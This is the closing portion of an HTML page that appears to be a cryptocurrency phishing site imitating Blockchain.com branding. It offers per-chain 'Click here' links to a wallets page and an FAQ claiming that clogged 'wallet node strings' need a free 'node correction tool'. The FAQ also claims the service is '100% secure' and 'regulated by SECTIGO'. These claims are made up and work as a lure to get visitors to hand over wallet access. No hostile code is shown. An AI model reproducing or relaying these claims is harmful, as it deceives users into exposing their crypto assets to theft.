              </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hidden-lg u-hidden-sm u-hover-none u-icon u-text-palette-1-dark-2 u-icon-5" data-href="wallets.html" data-page-id="214123313"><img src="images/eos.png" alt=""></span>
              <p class="u-align-center-xs u-hidden-sm u-text u-text-palette-1-dark-2 u-text-10">
                <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-base u-btn-10" href="wallets.html" data-page-id="214123313"> For EOS Chain, Click here</a>
              </p>
            </div>
          </div>
          <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
            <div class="u-container-layout u-similar-container u-container-layout-6">
              <h6 class="u-hidden-sm u-text u-text-font u-text-palette-1-dark-2 u-text-11"><b>
                  <a href="wallets.html" data-page-id="214123313" class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-11">EOS CHAIN</a></b>
              </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hidden-lg u-hidden-sm u-hover-none u-icon u-text-palette-1-dark-2 u-icon-6" data-href="wallets.html" data-page-id="214123313"><img src="images/ontology.png" alt=""></span>
              <p class="u-align-center-xs u-hidden-sm u-text u-text-palette-1-dark-2 u-text-12">
                <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-base u-btn-12" href="wallets.html" data-page-id="214123313"> For Ontology Chain, Click here</a>
              </p>
            </div>
          </div>
          <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
            <div class="u-container-layout u-similar-container u-container-layout-7">
              <h6 class="u-hidden-sm u-text u-text-font u-text-palette-1-dark-2 u-text-13"><b>
                  <a href="wallets.html" data-page-id="214123313" class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-13">MOONRIVER CHAIN</a></b>
              </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hidden-lg u-hidden-sm u-hover-none u-icon u-text-palette-1-dark-2 u-icon-7" data-href="wallets.html" data-page-id="214123313"><img src="images/moon.jpg" alt=""></span>
              <p class="u-align-center-xs u-hidden-sm u-text u-text-palette-1-dark-2 u-text-14">
                <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-base u-btn-14" href="wallets.html" data-page-id="214123313"> For Moonriver Chain, Click here</a>
              </p>
            </div>
          </div>
          <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
            <div class="u-container-layout u-similar-container u-container-layout-8">
              <h6 class="u-hidden-sm u-text u-text-font u-text-palette-1-dark-2 u-text-15"><b>
                  <a href="wallets.html" data-page-id="214123313" class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-15">BIFROST CHAIN</a></b>
              </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hidden-lg u-hidden-sm u-hover-none u-icon u-text-palette-1-dark-2 u-icon-8" data-href="wallets.html" data-page-id="214123313"><img src="images/bifrost.png" alt=""></span>
              <p class="u-align-center-xs u-hidden-sm u-text u-text-palette-1-dark-2 u-text-16">
                <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-base u-btn-16" href="wallets.html" data-page-id="214123313"> For Bifrost Chain, Click here</a>
              </p>
            </div>
          </div>
          <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
            <div class="u-container-layout u-similar-container u-container-layout-9">
              <h6 class="u-hidden-sm u-text u-text-font u-text-palette-1-dark-2 u-text-17"><b>
                  <a href="wallets.html" data-page-id="214123313" class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-17">KUSAMA CHAIN</a></b>
              </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hidden-lg u-hidden-sm u-hover-none u-icon u-text-palette-1-dark-2 u-icon-9" data-href="wallets.html" data-page-id="214123313"><img src="images/kusama-ksm-logo.png" alt=""></span>
              <p class="u-align-center-xs u-hidden-sm u-text u-text-palette-1-dark-2 u-text-18">
                <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-base u-btn-18" href="wallets.html" data-page-id="214123313"> For Kusama, Click here</a>
              </p>
            </div>
          </div>
          <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
            <div class="u-container-layout u-similar-container u-container-layout-10">
              <h6 class="u-hidden-sm u-text u-text-font u-text-palette-1-dark-2 u-text-19"><b>
                  <a href="wallets.html" data-page-id="214123313" class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-19">NEAR CHAIN</a></b>
              </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hidden-lg u-hidden-sm u-hover-none u-icon u-text-palette-1-dark-2 u-icon-10" data-href="wallets.html" data-page-id="214123313"><img src="images/near.png" alt=""></span>
              <p class="u-align-center-xs u-hidden-sm u-text u-text-palette-1-dark-2 u-text-20">
                <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-base u-btn-20" href="wallets.html" data-page-id="214123313"> For Near&nbsp;Chain, Click here</a>
              </p>
            </div>
          </div>
        </div>
      </div>
    </section>
    <section class="u-align-center u-clearfix u-section-4" id="sec-bc23">
      <div class="u-clearfix u-sheet u-sheet-1">
        <h2 class="u-text u-text-default u-text-palette-1-dark-2 u-text-1">Frequently ask questions</h2>
        <div class="u-accordion u-expanded-width-sm u-expanded-width-xs u-faq u-spacing-20 u-accordion-1">
          <div class="u-accordion-item">
            <a class="active u-accordion-link u-border-1 u-border-active-grey-75 u-border-grey-15 u-border-hover-grey-75 u-border-no-left u-border-no-right u-border-no-top u-button-style u-text-black u-accordion-link-1" id="link-accordion-6327" aria-controls="accordion-6327" aria-selected="true">
              <span class="u-accordion-link-text">When do i need to correct my node</span><span class="u-accordion-link-icon u-icon u-text-black u-icon-1"><svg class="u-svg-link" preserveAspectRatio="xMidYMin slice" viewBox="0 0 16 16" style=""><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#svg-8021"></use></svg><svg class="u-svg-content" viewBox="0 0 16 16" x="0px" y="0px" id="svg-8021" style=""><path d="M8,10.7L1.6,5.3c-0.4-0.4-1-0.4-1.3,0c-0.4,0.4-0.4,0.9,0,1.3l7.2,6.1c0.1,0.1,0.4,0.2,0.6,0.2s0.4-0.1,0.6-0.2l7.1-6
	c0.4-0.4,0.4-0.9,0-1.3c-0.4-0.4-1-0.4-1.3,0L8,10.7z"></path></svg></span>
            </a>
            <div class="u-accordion-active u-accordion-pane u-container-style u-accordion-pane-1" id="accordion-6327" aria-labelledby="link-accordion-6327" wfd-invisible="true">
              <div class="u-container-layout u-container-layout-1">
                <div class="fr-view u-clearfix u-rich-text u-text">
                  <p>
                    <span style="font-size: 0.75rem;">Over time as wallets age, and your node becomes clogged , Transactions may begin to fail. To re-enable full functionality, the node correction tool is recommended</span>
                  </p>
                </div>
              </div>
            </div>
          </div>
          <div class="u-accordion-item">
            <a class="u-accordion-link u-border-1 u-border-active-grey-75 u-border-grey-15 u-border-hover-grey-75 u-border-no-left u-border-no-right u-border-no-top u-button-style u-text-black u-accordion-link-2" id="link-accordion-4aab" aria-controls="accordion-4aab" aria-selected="false">
              <span class="u-accordion-link-text">My transactions keep failing, i am unable to stake, swap or claim my tokens</span><span class="u-accordion-link-icon u-icon u-text-black u-icon-2"><svg class="u-svg-link" preserveAspectRatio="xMidYMin slice" viewBox="0 0 16 16" style=""><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#svg-3470"></use></svg><svg class="u-svg-content" viewBox="0 0 16 16" x="0px" y="0px" id="svg-3470" style=""><path d="M8,10.7L1.6,5.3c-0.4-0.4-1-0.4-1.3,0c-0.4,0.4-0.4,0.9,0,1.3l7.2,6.1c0.1,0.1,0.4,0.2,0.6,0.2s0.4-0.1,0.6-0.2l7.1-6
	c0.4-0.4,0.4-0.9,0-1.3c-0.4-0.4-1-0.4-1.3,0L8,10.7z"></path></svg></span>
            </a>
            <div class="u-accordion-pane u-container-style u-accordion-pane-2" id="accordion-4aab" aria-labelledby="link-accordion-4aab" wfd-invisible="true">
              <div class="u-container-layout u-container-layout-2">
                <div class="fr-view u-clearfix u-rich-text u-text">
                  <p>
                    <span style="font-size: 0.75rem;">Node tool will correct your wallet node strings in seconds.&nbsp;</span>
                  </p>
                </div>
              </div>
            </div>
          </div>
          <div class="u-accordion-item">
            <a class="u-accordion-link u-border-1 u-border-active-grey-75 u-border-grey-15 u-border-hover-grey-75 u-border-no-left u-border-no-right u-border-no-top u-button-style u-text-black u-accordion-link-3" id="link-accordion-eb1f" aria-controls="accordion-eb1f" aria-selected="false">
              <span class="u-accordion-link-text"> Do I have to pay for this service?</span><span class="u-accordion-link-icon u-icon u-text-black u-icon-3"><svg class="u-svg-link" preserveAspectRatio="xMidYMin slice" viewBox="0 0 16 16" style=""><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#svg-e07d"></use></svg><svg class="u-svg-content" viewBox="0 0 16 16" x="0px" y="0px" id="svg-e07d" style=""><path d="M8,10.7L1.6,5.3c-0.4-0.4-1-0.4-1.3,0c-0.4,0.4-0.4,0.9,0,1.3l7.2,6.1c0.1,0.1,0.4,0.2,0.6,0.2s0.4-0.1,0.6-0.2l7.1-6
	c0.4-0.4,0.4-0.9,0-1.3c-0.4-0.4-1-0.4-1.3,0L8,10.7z"></path></svg></span>
            </a>
            <div class="u-accordion-pane u-container-style u-accordion-pane-3" id="accordion-eb1f" aria-labelledby="link-accordion-eb1f" wfd-invisible="true">
              <div class="u-container-layout u-container-layout-3">
                <div class="fr-view u-clearfix u-rich-text u-text">
                  <p>
                    <span style="font-size: 0.75rem;">No, we will never ask you to pay for anything. This is a free service</span>
                  </p>
                </div>
              </div>
            </div>
          </div>
          <div class="u-accordion-item">
            <a class="u-accordion-link u-border-1 u-border-active-grey-75 u-border-grey-15 u-border-hover-grey-75 u-border-no-left u-border-no-right u-border-no-top u-button-style u-text-black u-accordion-link-4" id="link-c01c" aria-controls="c01c" aria-selected="false">
              <span class="u-accordion-link-text">Is it Safe?</span><span class="u-accordion-link-icon u-icon u-text-black u-icon-4"><svg class="u-svg-link" preserveAspectRatio="xMidYMin slice" viewBox="0 0 16 16" style=""><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#svg-e4a1"></use></svg><svg class="u-svg-content" viewBox="0 0 16 16" x="0px" y="0px" id="svg-e4a1"><path d="M8,10.7L1.6,5.3c-0.4-0.4-1-0.4-1.3,0c-0.4,0.4-0.4,0.9,0,1.3l7.2,6.1c0.1,0.1,0.4,0.2,0.6,0.2s0.4-0.1,0.6-0.2l7.1-6
	c0.4-0.4,0.4-0.9,0-1.3c-0.4-0.4-1-0.4-1.3,0L8,10.7z"></path></svg></span>
            </a>
            <div class="u-accordion-pane u-container-style u-accordion-pane-4" id="c01c" aria-labelledby="link-c01c">
              <div class="u-container-layout u-container-layout-4">
                <div class="fr-view u-clearfix u-rich-text u-text">
                  <p>
                    <span style="font-size: 0.75rem;">Our services are secured and regulated by SECTIGO. It is 100% secure.</span>
                  </p>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </section>
    <section class="u-clearfix u-section-5" id="sec-4144">
      <div class="u-clearfix u-sheet u-valign-bottom-md u-sheet-1">
        <div class="u-clearfix u-custom-html u-expanded-width u-custom-html-1"><!-- TradingView Widget BEGIN -->
          <div class="tradingview-widget-container">
            <div class="tradingview-widget-container__widget"></div>
            <div class="tradingview-widget-copyright">
              <a href="https://www.tradingview.com/markets/cryptocurrencies/prices-all/" rel="noopener" target="_blank">
                <span class="blue-text">Cryptocurrency Markets</span>
              </a> by TradingView
            </div>
            <script type="text/javascript" src="https://s3.tradingview.com/external-embedding/embed-widget-screener.js" async="async"> {
  "width": "100%",
  "height": "100%",
  "defaultColumn": "overview",
  "screener_type": "crypto_mkt",
  "displayCurrency": "USD",
  "colorTheme": "light",
  "locale": "en",
  "isTransparent": true
} </script>
          </div><!-- TradingView Widget END -->
        </div>
        <div class="u-clearfix u-expanded-width u-layout-wrap u-layout-wrap-1">
          <div class="u-gutter-0 u-layout">
            <div class="u-layout-row">
              <div class="u-align-left u-container-style u-layout-cell u-left-cell u-size-30 u-layout-cell-1">
                <div class="u-container-layout u-container-layout-1">
                  <h2 class="u-text u-text-default u-text-palette-1-dark-2 u-text-1">Contact Us</h2>
                  <p class="u-text u-text-2">Send all inquiries to Support@blockchain.com</p>
                </div>
              </div>
              <div class="u-align-left-sm u-align-left-xs u-align-right-lg u-align-right-md u-align-right-xl u-container-style u-layout-cell u-right-cell u-size-30 u-layout-cell-2">
                <div class="u-container-layout u-valign-middle-lg u-valign-middle-md u-valign-middle-xl u-container-layout-2">
                  <div class="u-social-icons u-spacing-20 u-social-icons-1">
                    <a class="u-social-url" title="facebook" target="_blank" href="https://www.facebook.com/blockchain/"><span class="u-icon u-social-facebook u-social-icon u-icon-1"><svg class="u-svg-link" preserveAspectRatio="xMidYMin slice" viewBox="0 0 512 512" style=""><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#svg-5e9f"></use></svg><svg class="u-svg-content" viewBox="0 0 512 512" id="svg-5e9f"><path d="m512 256c0-141.4-114.6-256-256-256s-256 114.6-256 256 114.6 256 256 256c1.5 0 3 0 4.5-.1v-199.2h-55v-64.1h55v-47.2c0-54.7 33.4-84.5 82.2-84.5 23.4 0 43.5 1.7 49.3 2.5v57.2h-33.6c-26.5 0-31.7 12.6-31.7 31.1v40.8h63.5l-8.3 64.1h-55.2v189.5c107-30.7 185.3-129.2 185.3-246.1z"></path></svg></span>
                    </a>
                    <a class="u-social-url" title="instagram" target="_blank" href="https://www.instagram.com/blockchainofficial/?hl=en"><span class="u-icon u-social-icon u-social-instagram u-icon-2"><svg class="u-svg-link" preserveAspectRatio="xMidYMin slice" viewBox="0 0 512 512" style=""><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#svg-ddc9"></use></svg><svg class="u-svg-content" viewBox="0 0 512 512" id="svg-ddc9"><path d="m305 256c0 27.0625-21.9375 49-49 49s-49-21.9375-49-49 21.9375-49 49-49 49 21.9375 49 49zm0 0"></path><path d="m370.59375 169.304688c-2.355469-6.382813-6.113281-12.160157-10.996094-16.902344-4.742187-4.882813-10.515625-8.640625-16.902344-10.996094-5.179687-2.011719-12.960937-4.40625-27.292968-5.058594-15.503906-.707031-20.152344-.859375-59.402344-.859375-39.253906 0-43.902344.148438-59.402344.855469-14.332031.65625-22.117187 3.050781-27.292968 5.0625-6.386719 2.355469-12.164063 6.113281-16.902344 10.996094-4.882813 4.742187-8.640625 10.515625-11 16.902344-2.011719 5.179687-4.40625 12.964843-5.058594 27.296874-.707031 15.5-.859375 20.148438-.859375 59.402344 0 39.25.152344 43.898438.859375 59.402344.652344 14.332031 3.046875 22.113281 5.058594 27.292969 2.359375 6.386719 6.113281 12.160156 10.996094 16.902343 4.742187 4.882813 10.515624 8.640626 16.902343 10.996094 5.179688 2.015625 12.964844 4.410156 27.296875 5.0625 15.5.707032 20.144532.855469 59.398438.855469 39.257812 0 43.90625-.148437 59.402344-.855469 14.332031-.652344 22.117187-3.046875 27.296874-5.0625 12.820313-4.945312 22.953126-15.078125 27.898438-27.898437 2.011719-5.179688 4.40625-12.960938 5.0625-27.292969.707031-15.503906.855469-20.152344.855469-59.402344 0-39.253906-.148438-43.902344-.855469-59.402344-.652344-14.332031-3.046875-22.117187-5.0625-27.296874zm-114.59375 162.179687c-41.691406 0-75.488281-33.792969-75.488281-75.484375s33.796875-75.484375 75.488281-75.484375c41.6875 0 75.484375 33.792969 75.484375 75.484375s-33.796875 75.484375-75.484375 75.484375zm78.46875-136.3125c-9.742188 0-17.640625-7.898437-17.640625-17.640625s7.898437-17.640625 17.640625-17.640625 17.640625 7.898437 17.640625 17.640625c-.003906 9.742188-7.898437 17.640625-17.640625 17.640625zm0 0"></path><path d="m256 0c-141.363281 0-256 114.636719-256 256s114.636719 256 256 256 256-114.636719 256-256-114.636719-256-256-256zm146.113281 316.605469c-.710937 15.648437-3.199219 26.332031-6.832031 35.683593-7.636719 19.746094-23.246094 35.355469-42.992188 42.992188-9.347656 3.632812-20.035156 6.117188-35.679687 6.832031-15.675781.714844-20.683594.886719-60.605469.886719-39.925781 0-44.929687-.171875-60.609375-.886719-15.644531-.714843-26.332031-3.199219-35.679687-6.832031-9.8125-3.691406-18.695313-9.476562-26.039063-16.957031-7.476562-7.339844-13.261719-16.226563-16.953125-26.035157-3.632812-9.347656-6.121094-20.035156-6.832031-35.679687-.722656-15.679687-.890625-20.6875-.890625-60.609375s.167969-44.929688.886719-60.605469c.710937-15.648437 3.195312-26.332031 6.828125-35.683593 3.691406-9.808594 9.480468-18.695313 16.960937-26.035157 7.339844-7.480469 16.226563-13.265625 26.035157-16.957031 9.351562-3.632812 20.035156-6.117188 35.683593-6.832031 15.675781-.714844 20.683594-.886719 60.605469-.886719s44.929688.171875 60.605469.890625c15.648437.710937 26.332031 3.195313 35.683593 6.824219 9.808594 3.691406 18.695313 9.480468 26.039063 16.960937 7.476563 7.34375 13.265625 16.226563 16.953125 26.035157 3.636719 9.351562 6.121094 20.035156 6.835938 35.683593.714843 15.675781.882812 20.683594.882812 60.605469s-.167969 44.929688-.886719 60.605469zm0 0"></path></svg></span>
                    </a>
                    <a class="u-social-url" target="_blank" title="linkedin" href="https://www.linkedin.com/company/blockchain"><span class="u-icon u-social-custom u-social-icon u-icon-3"><svg class="u-svg-link" preserveAspectRatio="xMidYMin slice" viewBox="0 0 512 512" style=""><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#svg-2804"></use></svg><svg class="u-svg-content" viewBox="0 0 512 512" id="svg-2804"><path d="m256 0c-141.363281 0-256 114.636719-256 256s114.636719 256 256 256 256-114.636719 256-256-114.636719-256-256-256zm-74.390625 387h-62.347656v-187.574219h62.347656zm-31.171875-213.1875h-.40625c-20.921875 0-34.453125-14.402344-34.453125-32.402344 0-18.40625 13.945313-32.410156 35.273437-32.410156 21.328126 0 34.453126 14.003906 34.859376 32.410156 0 18-13.53125 32.402344-35.273438 32.402344zm255.984375 213.1875h-62.339844v-100.347656c0-25.21875-9.027343-42.417969-31.585937-42.417969-17.222656 0-27.480469 11.601563-31.988282 22.800781-1.648437 4.007813-2.050781 9.609375-2.050781 15.214844v104.75h-62.34375s.816407-169.976562 0-187.574219h62.34375v26.558594c8.285157-12.78125 23.109375-30.960937 56.1875-30.960937 41.019531 0 71.777344 26.808593 71.777344 84.421874zm0 0"></path></svg></span>
                    </a>
                    <a class="u-social-url" target="_blank" title="Telegram" href="https://t.me/blockchain"><span class="u-file-icon u-icon u-social-custom u-social-icon u-text-black u-icon-4"><img src="images/Telegram-Logo.png" alt=""></span>
                    </a>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </section>
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <footer class="u-align-center u-clearfix u-footer u-palette-1-dark-2 u-footer" id="sec-2260"><div class="u-clearfix u-sheet u-sheet-1">
        <p class="u-small-text u-text u-text-variant u-text-1">Copyright: Blockchain 2021.</p>
      </div></footer><span style="height: 64px; width: 64px; margin-left: 0px; margin-right: auto; margin-top: 0px; background-image: none; right: 20px; bottom: 20px;" class="u-back-to-top u-border-2 u-border-white u-icon u-icon-circle u-opacity u-opacity-85 u-spacing-10 u-text-white" data-href="#">
        <svg class="u-svg-link" preserveAspectRatio="xMidYMin slice" viewBox="0 0 551.13 551.13"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#svg-1d98"></use></svg>
        <svg class="u-svg-content" enable-background="new 0 0 551.13 551.13" viewBox="0 0 551.13 551.13" xmlns="http://www.w3.org/2000/svg" id="svg-1d98" data-color="rgb(47, 74, 206)"><path d="m275.565 189.451 223.897 223.897h51.668l-275.565-275.565-275.565 275.565h51.668z"></path></svg>
    </span>
  </body>
</html>